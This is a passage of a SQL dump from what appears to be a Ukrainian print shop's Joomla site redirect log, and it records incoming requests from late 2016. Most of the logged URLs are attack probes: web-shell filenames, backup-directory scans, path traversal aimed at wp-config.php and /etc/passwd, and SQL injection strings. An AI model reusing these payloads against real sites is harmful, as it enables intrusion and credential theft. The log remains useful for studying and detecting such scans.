00:00:00',301),(2559,'http://ekvatorprint.com.ua/images/sampledata/fruitshop/fruits.gif',NULL,'http://ekvatorprint.com.ua/','',2,0,'2016-12-05 12:38:12','0000-00-00 00:00:00',301),(2560,'http://ekvatorprint.com.ua/ekvatorprint.com.ua/modulnye-kartiny',NULL,'','',4,0,'2016-12-05 13:58:59','0000-00-00 00:00:00',301),(2561,'http://ekvatorprint.com.ua/media/nexamos.txt',NULL,'','',1,0,'2016-12-05 19:39:30','0000-00-00 00:00:00',301),(2562,'http://ekvatorprint.com.ua/wp-cache.php.suspected_',NULL,'http://www.googlebot.com/bot.html','',1,0,'2016-12-06 06:15:56','0000-00-00 00:00:00',301),(2563,'http://ekvatorprint.com.ua/wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php',NULL,'http://ekvatorprint.com.ua//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php','',5,0,'2016-12-06 06:16:06','0000-00-00 00:00:00',301),(2564,'http://ekvatorprint.com.ua/wp-content/uploads/files/guest/wp-cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2016-12-06 06:16:06','0000-00-00 00:00:00',301),(2565,'http://ekvatorprint.com.ua/wp-content/plugins/woocommerce-product-options/includes/image-upload.php',NULL,'http://ekvatorprint.com.ua//wp-content/plugins/woocommerce-product-options/includes/image-upload.php','',5,0,'2016-12-06 06:16:09','0000-00-00 00:00:00',301),(2566,'http://ekvatorprint.com.ua/wp-content/uploads/2016/12/wp-cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2016-12-06 06:16:10','0000-00-00 00:00:00',301),(2567,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/wp-cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2016-12-06 06:16:13','0000-00-00 00:00:00',301),(2568,'http://ekvatorprint.com.ua/lib/elfinder/build/elfinder.html',NULL,'','',2,0,'2016-12-07 03:22:19','0000-00-00 00:00:00',301),(2569,'http://ekvatorprint.com.ua/career/elfinder.html',NULL,'','',2,0,'2016-12-07 03:22:19','0000-00-00 00:00:00',301),(2570,'http://ekvatorprint.com.ua/market/elfinder.html',NULL,'','',2,0,'2016-12-07 03:22:19','0000-00-00 00:00:00',301),(2571,'http://ekvatorprint.com.ua/news/elfinder.html',NULL,'','',2,0,'2016-12-07 03:22:20','0000-00-00 00:00:00',301),(2572,'http://ekvatorprint.com.ua/elfinder1/elfinder.html',NULL,'','',2,0,'2016-12-07 03:22:20','0000-00-00 00:00:00',301),(2573,'http://ekvatorprint.com.ua/wp-content/upgrade/theme-compat/popup-pomo.php',NULL,'','',30,0,'2016-12-07 19:52:08','0000-00-00 00:00:00',301),(2574,'http://ekvatorprint.com.ua/backups/',NULL,'','',3,0,'2016-12-08 09:18:27','0000-00-00 00:00:00',301),(2575,'http://ekvatorprint.com.ua/administrator/components/com_easyjoomlabackup/backups/',NULL,'','',1,0,'2016-12-08 10:22:27','0000-00-00 00:00:00',301),(2576,'http://ekvatorprint.com.ua/dump/',NULL,'','',2,0,'2016-12-08 12:05:33','0000-00-00 00:00:00',301),(2577,'http://ekvatorprint.com.ua/administrator/components/com_backupdatabase/backup/',NULL,'','',1,0,'2016-12-08 12:29:04','0000-00-00 00:00:00',301),(2578,'http://ekvatorprint.com.ua/images/xxx.php',NULL,'','',5,0,'2016-12-08 14:40:01','0000-00-00 00:00:00',301),(2579,'http://ekvatorprint.com.ua/infos.php',NULL,'','',5,0,'2016-12-08 14:40:01','0000-00-00 00:00:00',301),(2580,'http://ekvatorprint.com.ua/administrator/includes/readmy.php',NULL,'','',5,0,'2016-12-08 14:40:01','0000-00-00 00:00:00',301),(2581,'http://ekvatorprint.com.ua/wp-main.php',NULL,'','',3,0,'2016-12-08 14:42:05','0000-00-00 00:00:00',301),(2582,'http://ekvatorprint.com.ua/sqlibak.php',NULL,'','',5,0,'2016-12-08 14:45:01','0000-00-00 00:00:00',301),(2583,'http://ekvatorprint.com.ua/images/google-assist.php',NULL,'','',4,0,'2016-12-08 14:50:38','0000-00-00 00:00:00',301),(2584,'http://ekvatorprint.com.ua/wp-content/plugins/myshe.php',NULL,'','',2,0,'2016-12-08 14:52:13','0000-00-00 00:00:00',301),(2585,'http://ekvatorprint.com.ua/maill.php',NULL,'','',3,0,'2016-12-08 14:54:04','0000-00-00 00:00:00',301),(2586,'http://ekvatorprint.com.ua/dumps/',NULL,'','',2,0,'2016-12-08 22:50:46','0000-00-00 00:00:00',301),(2587,'http://ekvatorprint.com.ua/sxd/backup/',NULL,'','',2,0,'2016-12-09 00:01:02','0000-00-00 00:00:00',301),(2588,'http://ekvatorprint.com.ua/administrator/components/com_datasafe_pro/DataSAFE_backups/',NULL,'','',1,0,'2016-12-09 09:21:46','0000-00-00 00:00:00',301),(2589,'http://ekvatorprint.com.ua/backup/',NULL,'','',6,0,'2016-12-09 11:52:21','0000-00-00 00:00:00',301),(2590,'http://ekvatorprint.com.ua/wp-includes/css/modules.php',NULL,'http://ekvatorprint.com.ua/wp-includes/css/modules.php','',6,0,'2016-12-09 15:37:07','0000-00-00 00:00:00',301),(2591,'http://ekvatorprint.com.ua/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php',NULL,'','',16,0,'2016-12-09 15:48:18','0000-00-00 00:00:00',301),(2592,'http://ekvatorprint.com.ua/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',16,0,'2016-12-09 15:51:15','0000-00-00 00:00:00',301),(2593,'http://ekvatorprint.com.ua/index.php/mdocs-posts/?mdocs-img-preview=../../../wp-config.php',NULL,'','',16,0,'2016-12-09 15:59:05','0000-00-00 00:00:00',301),(2594,'http://ekvatorprint.com.ua/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php',NULL,'','',16,0,'2016-12-09 16:04:02','0000-00-00 00:00:00',301),(2595,'http://ekvatorprint.com.ua/magmi/web/plugin_upload.php',NULL,'','',16,0,'2016-12-09 16:11:40','0000-00-00 00:00:00',301),(2596,'http://ekvatorprint.com.ua/mdocs-posts/?mdocs-img-preview=../../../wp-config.php',NULL,'','',16,0,'2016-12-09 16:13:48','0000-00-00 00:00:00',301),(2597,'http://ekvatorprint.com.ua/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php',NULL,'','',16,0,'2016-12-09 16:16:07','0000-00-00 00:00:00',301),(2598,'http://ekvatorprint.com.ua/wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php',NULL,'','',16,0,'2016-12-09 16:18:29','0000-00-00 00:00:00',301),(2599,'http://ekvatorprint.com.ua/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing',NULL,'','',16,0,'2016-12-09 16:37:39','0000-00-00 00:00:00',301),(2600,'http://ekvatorprint.com.ua/administrator/backups/',NULL,'','',1,0,'2016-12-09 16:56:39','0000-00-00 00:00:00',301),(2601,'http://ekvatorprint.com.ua/up.php',NULL,'','',44,0,'2016-12-10 22:17:38','0000-00-00 00:00:00',301),(2602,'http://ekvatorprint.com.ua/wp-admin',NULL,'','',5,0,'2016-12-11 08:25:07','0000-00-00 00:00:00',301),(2603,'http://ekvatorprint.com.ua/test-for-404-page',NULL,'','',1,0,'2016-12-11 08:25:09','0000-00-00 00:00:00',301),(2604,'http://ekvatorprint.com.ua/wp-admin/blog/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',15,0,'2016-12-12 05:26:02','0000-00-00 00:00:00',301),(2605,'http://ekvatorprint.com.ua/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php',NULL,'','',16,0,'2016-12-12 05:45:29','0000-00-00 00:00:00',301),(2606,'http://ekvatorprint.com.ua/wp-content/assets/themes/plugins/uploadify/uploadify.php',NULL,'','',15,0,'2016-12-12 05:47:46','0000-00-00 00:00:00',301),(2607,'http://ekvatorprint.com.ua/wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php',NULL,'','',15,0,'2016-12-12 05:50:26','0000-00-00 00:00:00',301),(2608,'http://ekvatorprint.com.ua/0DF44BD4-E38A-914C-9CE8-B8CC7EA75A30/1FA3FD38-9BA2-D647-8931-147785FF6AF2/log',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2016-12-13 09:09:38','0000-00-00 00:00:00',301),(2609,'http://ekvatorprint.com.ua/0DF44BD4-E38A-914C-9CE8-B8CC7EA75A30/1FA3FD38-9BA2-D647-8931-147785FF6AF2/from',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',105,0,'2016-12-13 09:09:40','0000-00-00 00:00:00',301),(2610,'http://ekvatorprint.com.ua/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=../../../../wp-config.php',NULL,'','',1,0,'2016-12-13 21:58:03','0000-00-00 00:00:00',301),(2611,'http://ekvatorprint.com.ua/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php',NULL,'','',1,0,'2016-12-13 22:03:46','0000-00-00 00:00:00',301),(2612,'http://ekvatorprint.com.ua/wp-content/plugins/post-star-rating/psr-ajax-stars.php?p=1',NULL,'','',1,0,'2016-12-13 22:07:40','0000-00-00 00:00:00',301),(2613,'http://ekvatorprint.com.ua/wp-content/plugins/tierra-billboard-manager/tierra-billboard-playlist.php?id=../../../../../../wp-config.php',NULL,'','',1,0,'2016-12-13 22:10:05','0000-00-00 00:00:00',301),(2614,'http://ekvatorprint.com.ua/wp-content/themes/wp-config.php',NULL,'','',1,0,'2016-12-13 22:28:22','0000-00-00 00:00:00',301),(2615,'http://ekvatorprint.com.ua/wp-content/wp-config.php',NULL,'','',1,0,'2016-12-13 22:32:32','0000-00-00 00:00:00',301),(2616,'http://ekvatorprint.com.ua/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php',NULL,'','',1,0,'2016-12-13 22:37:41','0000-00-00 00:00:00',301),(2617,'http://ekvatorprint.com.ua/bifoanuh',NULL,'','',1,0,'2016-12-15 07:08:02','0000-00-00 00:00:00',301),(2618,'http://ekvatorprint.com.ua/wp-admin/logo_img.php',NULL,'','',1,0,'2016-12-15 13:51:43','0000-00-00 00:00:00',301),(2619,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js2ee2100a9127451a41de5a4c2c62e127',NULL,'','',1,0,'2016-12-15 19:09:00','0000-00-00 00:00:00',301),(2620,'http://ekvatorprint.com.ua/templates/beez/c99.php',NULL,'','',1,0,'2016-12-18 22:39:20','0000-00-00 00:00:00',301),(2621,'http://ekvatorprint.com.ua/libraries/joomla/cache/info.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/info.php','',1,0,'2016-12-20 02:41:31','0000-00-00 00:00:00',301),(2622,'http://ekvatorprint.com.ua/m/printing-on-vinyl',NULL,'','',2,0,'2016-12-20 14:26:05','0000-00-00 00:00:00',301),(2623,'http://ekvatorprint.com.ua/mobile/printing-on-vinyl',NULL,'','',2,0,'2016-12-20 14:26:28','0000-00-00 00:00:00',301),(2624,'http://ekvatorprint.com.ua/mobile/',NULL,'','',7,0,'2016-12-21 03:52:23','0000-00-00 00:00:00',301),(2625,'http://ekvatorprint.com.ua/m/',NULL,'','',7,0,'2016-12-21 03:52:25','0000-00-00 00:00:00',301),(2626,'http://ekvatorprint.com.ua/index.php?option=com_users\'+oRdEr+bY+1+--+;&view=remind',NULL,'','',1,0,'2016-12-21 13:00:16','0000-00-00 00:00:00',301),(2627,'http://ekvatorprint.com.ua/index.php?option=com_users\'+ORDEr+By+999+--+;&view=remind',NULL,'','',1,0,'2016-12-21 13:00:17','0000-00-00 00:00:00',301),(2628,'http://ekvatorprint.com.ua/index.php?option=-1\'+AND+(/*!SElEcT*/+8041+FRoM(/*!selEcT*/+COUNT(*),CONCAt((/*!SelEcT*/+concat(0x7c3a3a3a3a,substring(database(),1,52),0x3a3a3a3a7c)+),floor(rand(0)*2))x+FRoM+INFORMATION_SCHEMA.TABLES+GROuP+By+x)a)&view=remind',NULL,'','',1,0,'2016-12-21 13:00:18','0000-00-00 00:00:00',301),(2629,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/passwd&view=remind',NULL,'','',2,0,'2016-12-21 13:00:19','0000-00-00 00:00:00',301),(2630,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/hosts&view=remind',NULL,'','',2,0,'2016-12-21 13:00:20','0000-00-00 00:00:00',301),(2631,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../proc/self/status&view=remind',NULL,'','',2,0,'2016-12-21 13:00:21','0000-00-00 00:00:00',301),(2632,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/passwd\0&view=remind',NULL,'','',2,0,'2016-12-21 13:00:22','0000-00-00 00:00:00',301),(2633,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/hosts\0&view=remind',NULL,'','',2,0,'2016-12-21 13:00:23','0000-00-00 00:00:00',301),(2634,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../proc/self/status\0&view=remind',NULL,'','',2,0,'2016-12-21 13:00:24','0000-00-00 00:00:00',301),(2635,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:25','0000-00-00 00:00:00',301),(2636,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:26','0000-00-00 00:00:00',301),(2637,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../proc/self/status/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:28','0000-00-00 00:00:00',301),(2638,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/passwd//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:29','0000-00-00 00:00:00',301),(2639,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/hosts//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:32','0000-00-00 00:00:00',301),(2640,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../proc/self/status//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:33','0000-00-00 00:00:00',301),(2641,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/passwd\0&view=remind',NULL,'','',2,0,'2016-12-21 13:00:34','0000-00-00 00:00:00',301),(2642,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/hosts\0&view=remind',NULL,'','',2,0,'2016-12-21 13:00:35','0000-00-00 00:00:00',301),(2643,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../proc/self/status\0&view=remind',NULL,'','',2,0,'2016-12-21 13:00:36','0000-00-00 00:00:00',301),(2644,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:37','0000-00-00 00:00:00',301),(2645,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:38','0000-00-00 00:00:00',301),(2646,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../proc/self/status/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:39','0000-00-00 00:00:00',301),(2647,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/passwd//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:40','0000-00-00 00:00:00',301),(2648,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/hosts//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:41','0000-00-00 00:00:00',301),(2649,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../proc/self/status//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:42','0000-00-00 00:00:00',301),(2650,'http://ekvatorprint.com.ua/index.php?option=com_users\'+and+3>\'1&view=remind',NULL,'','',1,0,'2016-12-21 13:00:42','0000-00-00 00:00:00',301),(2651,'http://ekvatorprint.com.ua/index.php?option=com_users\'+and+3>\'4&view=remind',NULL,'','',1,0,'2016-12-21 13:00:43','0000-00-00 00:00:00',301),(2652,'http://ekvatorprint.com.ua/index.php?option=com_users\"+oRdEr+bY+1+--+;&view=remind',NULL,'','',1,0,'2016-12-21 13:00:44','0000-00-00 00:00:00',301),(2653,'http://ekvatorprint.com.ua/index.php?option=com_users\"+ORDEr+By+999+--+;&view=remind',NULL,'','',1,0,'2016-12-21 13:00:45','0000-00-00 00:00:00',301),(2654,'http://ekvatorprint.com.ua/index.php?option=-1\"+AND+(/*!SElEcT*/+8041+FRoM(/*!selEcT*/+COUNT(*),CONCAt((/*!SelEcT*/+concat(0x7c3a3a3a3a,substring(database(),1,52),0x3a3a3a3a7c)+),floor(rand(0)*2))x+FRoM+INFORMATION_SCHEMA.TABLES+GROuP+By+x)a)&view=remind',NULL,'','',1,0,'2016-12-21 13:00:45','0000-00-00 00:00:00',301),(2655,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.